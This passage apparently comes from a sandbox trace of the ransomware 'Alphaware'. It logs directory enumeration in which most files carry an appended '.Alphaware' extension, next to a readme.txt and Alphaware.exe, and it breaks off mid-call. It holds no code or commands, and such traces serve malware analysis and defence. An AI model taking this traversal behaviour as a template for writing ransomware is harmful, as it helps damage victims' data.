ftCreationTime.dwLowDateTime=0x4e2bccb0, ftCreationTime.dwHighDateTime=0x1d97225, ftLastAccessTime.dwLowDateTime=0xd06c8650, ftLastAccessTime.dwHighDateTime=0x1d9744c, ftLastWriteTime.dwLowDateTime=0x81eeb320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14934, dwReserved0=0x0, dwReserved1=0x0, cFileName="9g0 rDMpBlzVC.swf.Alphaware", cAlternateFileName="9G0RDM~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50473680, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x50dfcd00, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9ead0300, ftLastWriteTime.dwHighDateTime=0x1d98983, nFileSizeHigh=0x0, nFileSizeLow=0x10d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphaware.exe", cAlternateFileName="ALPHAW~1.EXE")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852fa510, ftCreationTime.dwHighDateTime=0x1d96d25, ftLastAccessTime.dwLowDateTime=0xff631450, ftLastAccessTime.dwHighDateTime=0x1d96d68, ftLastWriteTime.dwLowDateTime=0x81f5d740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xbfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="c-jf 0ya1RIcN.mp4.Alphaware", cAlternateFileName="C-JF0Y~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618a290, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bbd27c0, ftLastAccessTime.dwHighDateTime=0x1d96f94, ftLastWriteTime.dwLowDateTime=0x81fa9a00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cZ6ivAAtP9f8.m4a.Alphaware", cAlternateFileName="CZ6IVA~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8201be20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x804bb920, ftCreationTime.dwHighDateTime=0x1d972df, ftLastAccessTime.dwLowDateTime=0x1e323290, ftLastAccessTime.dwHighDateTime=0x1d97614, ftLastWriteTime.dwLowDateTime=0x820680e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9008, dwReserved0=0x0, dwReserved1=0x0, cFileName="ELJrj3fRtgYOpT3c_m.mp4.Alphaware", cAlternateFileName="ELJRJ3~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df57b0, ftCreationTime.dwHighDateTime=0x1d9684e, ftLastAccessTime.dwLowDateTime=0xcd8c2700, ftLastAccessTime.dwHighDateTime=0x1d96ddb, ftLastWriteTime.dwLowDateTime=0x820da500, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1fda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fWyG0v4r7aIxC.gif.Alphaware", cAlternateFileName="FWYG0V~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a0d1f70, ftCreationTime.dwHighDateTime=0x1d966e3, ftLastAccessTime.dwLowDateTime=0x884587a0, ftLastAccessTime.dwHighDateTime=0x1d968f3, ftLastWriteTime.dwLowDateTime=0x8214c920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e620, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPAZp7HIeyfBa.avi.Alphaware", cAlternateFileName="IPAZP7~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76200920, ftCreationTime.dwHighDateTime=0x1d96988, ftLastAccessTime.dwLowDateTime=0xc8474ef0, ftLastAccessTime.dwHighDateTime=0x1d96d09, ftLastWriteTime.dwLowDateTime=0x82198be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x158a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="j 99Z9MOpk.pdf.Alphaware", cAlternateFileName="J99Z9M~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64186c0, ftCreationTime.dwHighDateTime=0x1d973b4, ftLastAccessTime.dwLowDateTime=0x82a38ef0, ftLastAccessTime.dwHighDateTime=0x1d97618, ftLastWriteTime.dwLowDateTime=0x8220b000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xef60, dwReserved0=0x0, dwReserved1=0x0, cFileName="JmY86mr.swf.Alphaware", cAlternateFileName="JMY86M~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a645f0, ftCreationTime.dwHighDateTime=0x1d970cf, ftLastAccessTime.dwLowDateTime=0xa0f3fbd0, ftLastAccessTime.dwHighDateTime=0x1d971d4, ftLastWriteTime.dwLowDateTime=0xa0f3fbd0, ftLastWriteTime.dwHighDateTime=0x1d971d4, nFileSizeHigh=0x0, nFileSizeLow=0x115f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jNMMi.ots", cAlternateFileName="")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce564210, ftCreationTime.dwHighDateTime=0x1d97560, ftLastAccessTime.dwLowDateTime=0x34677f10, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x822572c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="kbuOLBA.swf.Alphaware", cAlternateFileName="KBUOLB~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c1b19f0, ftCreationTime.dwHighDateTime=0x1d96657, ftLastAccessTime.dwLowDateTime=0x2adc7f00, ftLastAccessTime.dwHighDateTime=0x1d96831, ftLastWriteTime.dwLowDateTime=0x822c96e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x64a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KMPe82eGM5iAzO PVI.mp3.Alphaware", cAlternateFileName="KMPE82~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8f1ece0, ftCreationTime.dwHighDateTime=0x1d96ee9, ftLastAccessTime.dwLowDateTime=0xd86d5fb0, ftLastAccessTime.dwHighDateTime=0x1d97171, ftLastWriteTime.dwLowDateTime=0x82361c60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9574, dwReserved0=0x0, dwReserved1=0x0, cFileName="MKPZbzGpKYHPVsXosEp3.mp3.Alphaware", cAlternateFileName="MKPZBZ~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5181d1d0, ftCreationTime.dwHighDateTime=0x1d970ee, ftLastAccessTime.dwLowDateTime=0xcabd79d0, ftLastAccessTime.dwHighDateTime=0x1d972c1, ftLastWriteTime.dwLowDateTime=0x823adf20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5308, dwReserved0=0x0, dwReserved1=0x0, cFileName="MNGJ sodzb1khxMh.mp4.Alphaware", cAlternateFileName="MNGJSO~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46c6b0d0, ftCreationTime.dwHighDateTime=0x1d96abd, ftLastAccessTime.dwLowDateTime=0x98d5c7c0, ftLastAccessTime.dwHighDateTime=0x1d96c9e, ftLastWriteTime.dwLowDateTime=0x823fa1e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x156c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="mvpq.xls.Alphaware", cAlternateFileName="MVPQXL~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2ab00, ftCreationTime.dwHighDateTime=0x1d96ed7, ftLastAccessTime.dwLowDateTime=0x50250fa0, ftLastAccessTime.dwHighDateTime=0x1d9741d, ftLastWriteTime.dwLowDateTime=0x8246c600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13108, dwReserved0=0x0, dwReserved1=0x0, cFileName="mxWMxpSlb1Z2y3xfhO0.swf.Alphaware", cAlternateFileName="MXWMXP~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c9986a0, ftCreationTime.dwHighDateTime=0x1d9743e, ftLastAccessTime.dwLowDateTime=0x990eef10, ftLastAccessTime.dwHighDateTime=0x1d97634, ftLastWriteTime.dwLowDateTime=0x82492760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e48, dwReserved0=0x0, dwReserved1=0x0, cFileName="oa aQQjrX6y_jTlap6.png.Alphaware", cAlternateFileName="OAAQQJ~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafdd0830, ftCreationTime.dwHighDateTime=0x1d96824, ftLastAccessTime.dwLowDateTime=0xe04cd250, ftLastAccessTime.dwHighDateTime=0x1d96cbd, ftLastWriteTime.dwLowDateTime=0x824dea20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15bf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="OYZWN3-fBul2M9U.wav.Alphaware", cAlternateFileName="OYZWN3~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb901750, ftCreationTime.dwHighDateTime=0x1d96d3c, ftLastAccessTime.dwLowDateTime=0xfe05c0b0, ftLastAccessTime.dwHighDateTime=0x1d974db, ftLastWriteTime.dwLowDateTime=0x8252ace0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5074, dwReserved0=0x0, dwReserved1=0x0, cFileName="PYDVqXrN.mkv.Alphaware", cAlternateFileName="PYDVQX~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x814cd5a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x814cd5a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x814cd5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1bd4770, ftCreationTime.dwHighDateTime=0x1d974ae, ftLastAccessTime.dwLowDateTime=0xfca44b10, ftLastAccessTime.dwHighDateTime=0x1d9767f, ftLastWriteTime.dwLowDateTime=0x8259d100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc4c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmPQA vuvasucn14.mkv.Alphaware", cAlternateFileName="RMPQAV~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a130c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0xff802ae0, ftLastAccessTime.dwHighDateTime=0x1d9750b, ftLastWriteTime.dwLowDateTime=0x825c3260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="s4xZHJNmFEW_-to_l.xls.Alphaware", cAlternateFileName="S4XZHJ~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8084c0, ftCreationTime.dwHighDateTime=0x1d96ee5, ftLastAccessTime.dwLowDateTime=0xa0720140, ftLastAccessTime.dwHighDateTime=0x1d9755b, ftLastWriteTime.dwLowDateTime=0xa0720140, ftLastWriteTime.dwHighDateTime=0x1d9755b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UKlsVP0OeoLUyu0aA", cAlternateFileName="UKLSVP~1")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7325e0, ftCreationTime.dwHighDateTime=0x1d966c3, ftLastAccessTime.dwLowDateTime=0x627aa2b0, ftLastAccessTime.dwHighDateTime=0x1d97002, ftLastWriteTime.dwLowDateTime=0x8260f520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vjc3e20l.jpg.Alphaware", cAlternateFileName="VJC3E2~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbed10810, ftCreationTime.dwHighDateTime=0x1d96d7d, ftLastAccessTime.dwLowDateTime=0xc5a4d90, ftLastAccessTime.dwHighDateTime=0x1d97656, ftLastWriteTime.dwLowDateTime=0x8265b7e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x189b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vxbet57tOqM.png.Alphaware", cAlternateFileName="VXBET5~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9f3610, ftCreationTime.dwHighDateTime=0x1d96f3d, ftLastAccessTime.dwLowDateTime=0x88683230, ftLastAccessTime.dwHighDateTime=0x1d97525, ftLastWriteTime.dwLowDateTime=0x826a7aa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wd6KHPvLn hvANgS.mp3.Alphaware", cAlternateFileName="WD6KHP~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37a4f0, ftCreationTime.dwHighDateTime=0x1d96643, ftLastAccessTime.dwLowDateTime=0xd9cd9ba0, ftLastAccessTime.dwHighDateTime=0x1d96d42, ftLastWriteTime.dwLowDateTime=0x82719ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5034, dwReserved0=0x0, dwReserved1=0x0, cFileName="WQTdEEFonuZ7KxbDBX.pps.Alphaware", cAlternateFileName="WQTDEE~1.ALP")) returned 1 [0080.979] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56579b70, ftCreationTime.dwHighDateTime=0x1d9695c, ftLastAccessTime.dwLowDateTime=0xf3b0e690, ftLastAccessTime.dwHighDateTime=0x1d97313, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfj_k_QyvZX0.gif.Alphaware", cAlternateFileName="XFJ_K_~1.ALP")) returned 1 [0080.980] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56579b70, ftCreationTime.dwHighDateTime=0x1d9695c, ftLastAccessTime.dwLowDateTime=0xf3b0e690, ftLastAccessTime.dwHighDateTime=0x1d97313, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfj_k_QyvZX0.gif.Alphaware", cAlternateFileName="XFJ_K_~1.ALP")) returned 0 [0080.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0080.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0080.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0080.982] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8084c0, ftCreationTime.dwHighDateTime=0x1d96ee5, ftLastAccessTime.dwLowDateTime=0xa0720140, ftLastAccessTime.dwHighDateTime=0x1d9755b, ftLastWriteTime.dwLowDateTime=0xa0720140, ftLastWriteTime.dwHighDateTime=0x1d9755b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ceff40, ftCreationTime.dwHighDateTime=0x1d97157, ftLastAccessTime.dwLowDateTime=0xd09f55f0, ftLastAccessTime.dwHighDateTime=0x1d97427, ftLastWriteTime.dwLowDateTime=0xd09f55f0, ftLastWriteTime.dwHighDateTime=0x1d97427, nFileSizeHigh=0x0, nFileSizeLow=0x1116b, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Cj6mvIu4.odt", cAlternateFileName="-CJ6MV~1.ODT")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa54100, ftCreationTime.dwHighDateTime=0x1d969ac, ftLastAccessTime.dwLowDateTime=0xf4a8ece0, ftLastAccessTime.dwHighDateTime=0x1d96b99, ftLastWriteTime.dwLowDateTime=0xf4a8ece0, ftLastWriteTime.dwHighDateTime=0x1d96b99, nFileSizeHigh=0x0, nFileSizeLow=0xf626, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BM5 _1HkTZyXvgJAFgc.flv", cAlternateFileName="1BM5_1~1.FLV")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5d9440, ftCreationTime.dwHighDateTime=0x1d97056, ftLastAccessTime.dwLowDateTime=0xad82b670, ftLastAccessTime.dwHighDateTime=0x1d97346, ftLastWriteTime.dwLowDateTime=0xad82b670, ftLastWriteTime.dwHighDateTime=0x1d97346, nFileSizeHigh=0x0, nFileSizeLow=0x1dec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fj0H-XEEG0GP.flv", cAlternateFileName="FJ0H-X~1.FLV")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0ecb90, ftCreationTime.dwHighDateTime=0x1d96f36, ftLastAccessTime.dwLowDateTime=0xd356be60, ftLastAccessTime.dwHighDateTime=0x1d97322, ftLastWriteTime.dwLowDateTime=0xd356be60, ftLastWriteTime.dwHighDateTime=0x1d97322, nFileSizeHigh=0x0, nFileSizeLow=0x10bdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="grD5c_7rsX_r-Az.doc", cAlternateFileName="GRD5C_~1.DOC")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x572ee5c0, ftCreationTime.dwHighDateTime=0x1d96cd7, ftLastAccessTime.dwLowDateTime=0x5fa6c0a0, ftLastAccessTime.dwHighDateTime=0x1d9720f, ftLastWriteTime.dwLowDateTime=0x5fa6c0a0, ftLastWriteTime.dwHighDateTime=0x1d9720f, nFileSizeHigh=0x0, nFileSizeLow=0x1755a, dwReserved0=0x0, dwReserved1=0x0, cFileName="IoUNPPwfOO3o6JZNAZ0x.png", cAlternateFileName="IOUNPP~1.PNG")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c78100, ftCreationTime.dwHighDateTime=0x1d96bf5, ftLastAccessTime.dwLowDateTime=0x31ce380, ftLastAccessTime.dwHighDateTime=0x1d97144, ftLastWriteTime.dwLowDateTime=0x31ce380, ftLastWriteTime.dwHighDateTime=0x1d97144, nFileSizeHigh=0x0, nFileSizeLow=0xe6a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jc7CE.wav", cAlternateFileName="")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb0ef00, ftCreationTime.dwHighDateTime=0x1d96bca, ftLastAccessTime.dwLowDateTime=0xed24a8e0, ftLastAccessTime.dwHighDateTime=0x1d96df8, ftLastWriteTime.dwLowDateTime=0xed24a8e0, ftLastWriteTime.dwHighDateTime=0x1d96df8, nFileSizeHigh=0x0, nFileSizeLow=0x8492, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kmo_0PpyMcbzk.m4a", cAlternateFileName="KMO_0P~1.M4A")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf43bd8d0, ftCreationTime.dwHighDateTime=0x1d974d1, ftLastAccessTime.dwLowDateTime=0x482b21f0, ftLastAccessTime.dwHighDateTime=0x1d97575, ftLastWriteTime.dwLowDateTime=0x482b21f0, ftLastWriteTime.dwHighDateTime=0x1d97575, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnrpsaEkvylzPJqZCM2l.mkv", cAlternateFileName="ONRPSA~1.MKV")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83554ad0, ftCreationTime.dwHighDateTime=0x1d96e59, ftLastAccessTime.dwLowDateTime=0x72c43140, ftLastAccessTime.dwHighDateTime=0x1d9747b, ftLastWriteTime.dwLowDateTime=0x72c43140, ftLastWriteTime.dwHighDateTime=0x1d9747b, nFileSizeHigh=0x0, nFileSizeLow=0x6941, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qs1EsaM6mnJQuW3k.xlsx", cAlternateFileName="QS1ESA~1.XLS")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14fa0b00, ftCreationTime.dwHighDateTime=0x1d96e15, ftLastAccessTime.dwLowDateTime=0x36702850, ftLastAccessTime.dwHighDateTime=0x1d9754a, ftLastWriteTime.dwLowDateTime=0x36702850, ftLastWriteTime.dwHighDateTime=0x1d9754a, nFileSizeHigh=0x0, nFileSizeLow=0x166ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SjIEHWNzBPbEPK.ppt", cAlternateFileName="SJIEHW~1.PPT")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2160a710, ftCreationTime.dwHighDateTime=0x1d9699b, ftLastAccessTime.dwLowDateTime=0x172cf9a0, ftLastAccessTime.dwHighDateTime=0x1d96f5f, ftLastWriteTime.dwLowDateTime=0x172cf9a0, ftLastWriteTime.dwHighDateTime=0x1d96f5f, nFileSizeHigh=0x0, nFileSizeLow=0x132d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z3ZXfX.bmp", cAlternateFileName="")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54550780, ftCreationTime.dwHighDateTime=0x1d969c6, ftLastAccessTime.dwLowDateTime=0x22860c70, ftLastAccessTime.dwHighDateTime=0x1d973dc, ftLastWriteTime.dwLowDateTime=0x22860c70, ftLastWriteTime.dwHighDateTime=0x1d973dc, nFileSizeHigh=0x0, nFileSizeLow=0xc8c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="_7pBY2-omnUcu.gif", cAlternateFileName="_7PBY2~1.GIF")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0080.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0080.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0080.984] SetFileAttributesW 